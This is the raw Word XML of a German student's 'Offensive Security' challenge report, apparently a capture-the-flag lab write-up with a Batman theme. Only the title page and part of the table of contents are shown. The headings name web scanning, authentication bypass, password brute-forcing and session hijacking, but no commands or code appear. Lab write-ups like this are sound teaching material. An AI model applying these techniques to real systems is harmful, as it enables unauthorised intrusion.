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93A08" w14:textId="77777777" w:rsidR="00BF0354" w:rsidRPr="0061670A" w:rsidRDefault="00BF7EB9" w:rsidP="00111AC6">
      <w:pPr>
        <w:pStyle w:val="Untertitel"/>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="0061670A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78A4C70C" wp14:editId="64750C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C2A4" w14:textId="2142EF38" w:rsidR="00681036" w:rsidRPr="00B55943" w:rsidRDefault="00681036" w:rsidP="00B55943">
                            <w:pPr>
                              <w:pStyle w:val="Titel"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Offensive Securit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4C70C"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2DF9C2A4" w14:textId="2142EF38" w:rsidR="00681036" w:rsidRPr="00B55943" w:rsidRDefault="00681036" w:rsidP="00B55943">
                      <w:pPr>
                        <w:pStyle w:val="Titel"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Offensive Security</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchory="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="0061670A">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="796F4261" wp14:editId="3C52762E">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7BEB" w14:textId="77B24CA5" w:rsidR="00681036" w:rsidRDefault="00681036" w:rsidP="00BF7EB9">
                            <w:pPr>
                              <w:pStyle w:val="Untertitel"/>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Challenges Bericht</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="67AFAFCC" w14:textId="77777777" w:rsidR="00681036" w:rsidRPr="00BF0354" w:rsidRDefault="00681036" w:rsidP="00BF7EB9">
                            <w:pPr>
                              <w:pStyle w:val="Untertitel"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00BF0354">
                              <w:t>im Studiengang</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BF0354">
                              <w:br/>
                            </w:r>
                            <w:r>
                              <w:t>Softwaretechnik und Medieninformatik</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="59F8259C" w14:textId="77777777" w:rsidR="00681036" w:rsidRDefault="00681036" w:rsidP="005D26BD">
                            <w:pPr>
                              <w:pStyle w:val="Untertitel"/>
                            </w:pPr>
                            <w:r>
                              <w:t>vorgelegt von</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1FC7BF38" w14:textId="77777777" w:rsidR="00681036" w:rsidRDefault="00681036" w:rsidP="00BA7590">
                            <w:pPr>
                              <w:pStyle w:val="Untertitel"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Jan Binder</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:br/>
                            </w:r>
                            <w:r>
                              <w:t>Matr.-Nr.: 749707</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4CFF9040" w14:textId="368B8FEB" w:rsidR="00681036" w:rsidRPr="00BA7590" w:rsidRDefault="00681036" w:rsidP="00BA7590">
                            <w:pPr>
                              <w:pStyle w:val="Untertitel"/>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>am 31. Dezember 2018</w:t>
                            </w:r>
                            <w:r w:rsidRPr="005D26BD">
                              <w:t xml:space="preserve">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F4261" id="Textfeld 9" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:368.55pt;width:425.2pt;height:281.6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3F457BEB" w14:textId="77B24CA5" w:rsidR="00681036" w:rsidRDefault="00681036" w:rsidP="00BF7EB9">
                      <w:pPr>
                        <w:pStyle w:val="Untertitel"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Challenges Bericht</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="67AFAFCC" w14:textId="77777777" w:rsidR="00681036" w:rsidRPr="00BF0354" w:rsidRDefault="00681036" w:rsidP="00BF7EB9">
                      <w:pPr>
                        <w:pStyle w:val="Untertitel"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00BF0354">
                        <w:t>im Studiengang</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BF0354">
                        <w:br/>
                      </w:r>
                      <w:r>
                        <w:t>Softwaretechnik und Medieninformatik</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="59F8259C" w14:textId="77777777" w:rsidR="00681036" w:rsidRDefault="00681036" w:rsidP="005D26BD">
                      <w:pPr>
                        <w:pStyle w:val="Untertitel"/>
                      </w:pPr>
                      <w:r>
                        <w:t>vorgelegt von</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1FC7BF38" w14:textId="77777777" w:rsidR="00681036" w:rsidRDefault="00681036" w:rsidP="00BA7590">
                      <w:pPr>
                        <w:pStyle w:val="Untertitel"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Jan Binder</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r>
                        <w:t>Matr.-Nr.: 749707</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4CFF9040" w14:textId="368B8FEB" w:rsidR="00681036" w:rsidRPr="00BA7590" w:rsidRDefault="00681036" w:rsidP="00BA7590">
                      <w:pPr>
                        <w:pStyle w:val="Untertitel"/>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>am 31. Dezember 2018</w:t>
                      </w:r>
                      <w:r w:rsidRPr="005D26BD">
                        <w:t xml:space="preserve">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0800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="428C8EC3" wp14:editId="254DB6B1">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527C" w14:textId="7EE809D3" w:rsidR="00681036" w:rsidRPr="00BF0354" w:rsidRDefault="00681036" w:rsidP="004428C9">
                            <w:pPr>
                              <w:pStyle w:val="Untertitel"/>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2835"/>
                              </w:tabs>
                              <w:spacing w:before="0"/>
                              <w:jc w:val="left"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Prüfer/in: Thomas Fisch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C8EC3" id="Textfeld 10" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:425.2pt;height:61.05pt;z-index:25166080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5771527C" w14:textId="7EE809D3" w:rsidR="00681036" w:rsidRPr="00BF0354" w:rsidRDefault="00681036" w:rsidP="004428C9">
                      <w:pPr>
                        <w:pStyle w:val="Untertitel"/>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2835"/>
                        </w:tabs>
                        <w:spacing w:before="0"/>
                        <w:jc w:val="left"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Prüfer/in: Thomas Fischer</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchory="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22F0CB" w14:textId="77777777" w:rsidR="00735B62" w:rsidRPr="00735B62" w:rsidRDefault="00735B62">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607C5AFC" w14:textId="77777777" w:rsidR="00284FA6" w:rsidRDefault="00284FA6">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Ref418684066"/>
      <w:bookmarkStart w:id="2" w:name="_Toc438849"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Inhaltsverzeichnis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="613FA0F5" w14:textId="6D3ADAF7" w:rsidR="00837897"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837897">
        <w:t>Inhaltsverzeichnis</w:t>
      </w:r>
      <w:r w:rsidR="00837897">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00837897">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00837897">
        <w:instrText xml:space="preserve"> PAGEREF _Toc438849 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00837897">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00837897">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="610ED2A2" w14:textId="44B5B1F5" w:rsidR="00837897" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Batman</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438850 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B385D1" w14:textId="7A0C39DB" w:rsidR="00837897" w:rsidRDefault="00837897">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Level 1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438851 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52216B28" w14:textId="29770D85" w:rsidR="00837897" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis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Nikto Scan:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438852 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718BB44" w14:textId="78EBD6A4" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dirb Scan:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438853 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD50276" w14:textId="42D22294" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1.3</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Webdav:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438854 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC2BC8" w14:textId="23E9D2DE" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1.4</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Waynemanor</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438855 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB852FF" w14:textId="51C3CE4D" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.1.5</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Find Flag document:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438856 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1954FB72" w14:textId="052DD682" w:rsidR="00837897" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis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Authentifizierung überspringen:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438857 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F1329" w14:textId="4BF885F9" w:rsidR="00837897" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis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Brute Force Passwort:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438858 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A">
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF086D" w14:textId="47ED9AA8" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Level 2</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438859 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0383133F" w14:textId="64ACD101" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Batcave Zugang</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438860 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5685FC9A" w14:textId="70BEBF03" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2.2</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Struktur session_id</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438861 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3879EF" w14:textId="451C2C4A" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.2.3</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hijack Batman Session</w:t>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc438862 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008E799A" w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAAA56F" w14:textId="65099BE2" w:rsidR="00837897" w:rsidRPr="008E799A" w:rsidRDefault="00837897">
      <w:pPr>
        <w:pStyle w:val="Verzeichnis2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
